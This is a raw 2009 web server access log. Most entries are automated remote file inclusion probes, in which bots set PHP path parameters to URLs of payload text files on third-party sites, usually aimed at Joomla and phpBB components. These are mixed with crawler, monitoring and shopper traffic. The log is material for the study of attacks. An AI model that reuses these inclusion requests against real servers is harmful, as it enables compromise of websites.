64.27.6.186 - - [12/Aug/2009:06:34:45 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:34:55 -0400] "GET /config.php?path_to_root=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:34:55 -0400] "GET /logs/config.php?path_to_root=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:34:55 -0400] "GET /logs/access_log.Q109053000%20%20/config.php?path_to_root=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:34:55 -0400] "GET /logs/access_log.Q109072700%20%20/config.php?path_to_root=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.30.81.182 - - [12/Aug/2009:06:34:28 -0400] "GET /logs/access_log.Q109060100 HTTP/1.0" 200 4231911 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.189.113.234 - - [12/Aug/2009:06:35:34 -0400] "GET /logs/access_log.Q109071300%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.189.113.234 - - [12/Aug/2009:06:35:34 -0400] "GET /logs/access_log.Q109061200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
212.95.252.16 - - [12/Aug/2009:06:36:01 -0400] "HEAD /icons/apache_pb.gif HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
209.59.12.99 - - [12/Aug/2009:06:36:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.27.203.107 - - [12/Aug/2009:06:36:10 -0400] "GET /?DOCUMENT_ROOT=http://www.mistresslorisdungeon.com/chat/inc/cmses/kontol.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
91.142.209.134 - - [12/Aug/2009:06:37:48 -0400] "GET /logs/access_log.Q109080500%20%20/components/com_forum/download.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
91.142.209.134 - - [12/Aug/2009:06:37:56 -0400] "GET /logs/access_log.Q109080500%20%20/components/com_forum/download.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
91.142.209.134 - - [12/Aug/2009:06:37:56 -0400] "GET /logs/access_log.Q109072200%20%20/components/com_forum/download.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
91.142.209.134 - - [12/Aug/2009:06:37:56 -0400] "GET /logs/access_log.Q109072200%20%20/components/com_forum/download.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
91.142.209.134 - - [12/Aug/2009:06:38:07 -0400] "GET /logs/access_log.Q109080500%20%20/components/com_forum/download.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
91.142.209.134 - - [12/Aug/2009:06:38:07 -0400] "GET /logs/access_log.Q109072200%20%20/components/com_forum/download.php?phpbb_root_path=http://www.gluebert.de/plugins/system/copyright.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:38:11 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:38:11 -0400] "GET /logs/access_log.Q109072200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:38:11 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:38:23 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:06:40:18 -0400] "GET /logs/access_log.Q109060900/?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Aug/2009:06:40:22 -0400] "GET //?path%5Bdocroot%5D=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Aug/2009:06:40:22 -0400] "GET /logs/access_log.Q109071300%20%20//?path%5Bdocroot%5D=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Aug/2009:06:40:22 -0400] "GET /logs//?path%5Bdocroot%5D=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 200 13349 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:06:40:27 -0400] "GET ///components/com_facileforms/facileforms.frame.php?ff_compath=http://yc44.com/bbs/DQ_LIBS/skin_config/id_keparat.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
195.209.236.77 - - [12/Aug/2009:06:40:27 -0400] "GET /logs/access_log.Q109071800///components/com_facileforms/facileforms.frame.php?ff_compath=http://yc44.com/bbs/DQ_LIBS/skin_config/id_keparat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
195.209.236.77 - - [12/Aug/2009:06:40:27 -0400] "GET /logs///components/com_facileforms/facileforms.frame.php?ff_compath=http://yc44.com/bbs/DQ_LIBS/skin_config/id_keparat.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
195.209.236.77 - - [12/Aug/2009:06:40:27 -0400] "GET /logs/access_log.Q109051200///components/com_facileforms/facileforms.frame.php?ff_compath=http://yc44.com/bbs/DQ_LIBS/skin_config/id_keparat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
91.121.83.177 - - [12/Aug/2009:06:40:29 -0400] "GET /logs/access_log.Q109060900/?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:06:40:31 -0400] "GET ///components/com_facileforms/facileforms.frame.php?ff_compath=http://yc44.com/bbs/DQ_LIBS/skin_config/id_keparat.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
195.209.236.77 - - [12/Aug/2009:06:40:31 -0400] "GET /logs/access_log.Q109051200///components/com_facileforms/facileforms.frame.php?ff_compath=http://yc44.com/bbs/DQ_LIBS/skin_config/id_keparat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
195.209.236.77 - - [12/Aug/2009:06:40:31 -0400] "GET /logs/access_log.Q109071800///components/com_facileforms/facileforms.frame.php?ff_compath=http://yc44.com/bbs/DQ_LIBS/skin_config/id_keparat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
195.209.236.77 - - [12/Aug/2009:06:40:31 -0400] "GET /logs///components/com_facileforms/facileforms.frame.php?ff_compath=http://yc44.com/bbs/DQ_LIBS/skin_config/id_keparat.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
117.110.74.195 - - [12/Aug/2009:06:40:31 -0400] "GET /logs/access_log.Q109053000/config.php?path_to_root=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:40:31 -0400] "GET /logs/access_log.Q109072700/config.php?path_to_root=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.228.99.62 - - [12/Aug/2009:06:40:36 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:40:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:40:40 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:40:40 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
206.225.23.4 - - [12/Aug/2009:06:40:49 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:06:41:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
117.110.74.195 - - [12/Aug/2009:06:41:08 -0400] "GET /logs/access_log.Q109053000/config.php?path_to_root=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:41:08 -0400] "GET /logs/access_log.Q109072700/config.php?path_to_root=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
188.120.32.42 - - [12/Aug/2009:06:41:08 -0400] "GET /logs/access_log.Q109051200//?_SERVER[DOCUMENT_ROOT]=http://www.figure8flow.net/sape%0D? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
188.120.32.42 - - [12/Aug/2009:06:41:08 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.figure8flow.net/sape%0D? HTTP/1.1" 200 13349 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
188.120.32.42 - - [12/Aug/2009:06:41:08 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.figure8flow.net/sape%0D? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
117.110.74.195 - - [12/Aug/2009:06:41:13 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:41:13 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:41:13 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Aug/2009:06:41:30 -0400] "GET /logs/access_log.Q109071300//?path%5Bdocroot%5D=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Aug/2009:06:41:30 -0400] "GET /logs//?path%5Bdocroot%5D=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 200 13349 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Aug/2009:06:41:30 -0400] "GET //?path%5Bdocroot%5D=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Aug/2009:06:41:39 -0400] "GET //?path%5Bdocroot%5D=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Aug/2009:06:41:39 -0400] "GET /logs//?path%5Bdocroot%5D=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 200 13349 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:06:41:44 -0400] "GET ///components/com_facileforms/facileforms.frame.php?ff_compath=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:06:41:44 -0400] "GET /logs///components/com_facileforms/facileforms.frame.php?ff_compath=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:06:41:44 -0400] "GET /logs/access_log.Q109071800%20%20///components/com_facileforms/facileforms.frame.php?ff_compath=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:06:41:44 -0400] "GET /logs/access_log.Q109051200%20%20///components/com_facileforms/facileforms.frame.php?ff_compath=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Aug/2009:06:41:44 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
220.123.239.163 - - [12/Aug/2009:06:41:54 -0400] "GET /logs//?path%5Bdocroot%5D=http://happygage.com//bbs/skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 200 13349 "-" "Mozilla/5.0"
220.123.239.163 - - [12/Aug/2009:06:41:54 -0400] "GET /logs/access_log.Q109071300//?path%5Bdocroot%5D=http://happygage.com//bbs/skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
220.123.239.163 - - [12/Aug/2009:06:41:54 -0400] "GET //?path%5Bdocroot%5D=http://happygage.com//bbs/skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
172.16.1.180 - - [12/Aug/2009:06:41:59 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:06:41:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:06:41:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
220.123.239.163 - - [12/Aug/2009:06:42:12 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://happygage.com//bbs/skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.228.99.62 - - [12/Aug/2009:06:42:53 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS%20(S0040):0 HTTP/1.1" 200 69451 "http://www.acesurgical.com/allooss.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:56 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:56 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:56 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:57 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:57 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:57 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:57 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:57 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:57 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:57 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:58 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:58 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:58 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:58 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:58 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:58 -0400] "GET /images/items/ALLOOSS2_THUMB.JPG HTTP/1.1" 200 2001 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:58 -0400] "GET /images/items/ALLOOSS1_THUMB.JPG HTTP/1.1" 200 30054 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:59 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:59 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:59 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:59 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:59 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:42:59 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:43:00 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:43:00 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:43:00 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:43:00 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:43:00 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:43:00 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
